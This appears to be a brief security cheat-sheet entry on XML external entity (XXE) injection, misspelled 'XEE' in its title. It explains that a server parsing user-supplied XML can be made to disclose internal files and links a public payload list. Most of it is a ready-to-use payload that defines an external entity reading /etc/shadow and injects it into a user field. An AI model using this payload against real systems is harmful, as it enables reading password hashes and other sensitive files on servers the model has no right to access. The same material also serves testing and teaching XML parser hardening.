XEE (Xml Entity exploit )

XEE (Xml Entity exploit )

• if the remote server is parsing an xml of our own…
• we can use xmlentity to read internal files
• https://github.com/payloadbox/xxe-injection-payload-list

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow"> ]>
<userInfo>
 <firstName>John</firstName>
 <lastName>&ent;</lastName>
</userInfo>

the &ent; is replaced with the content of the file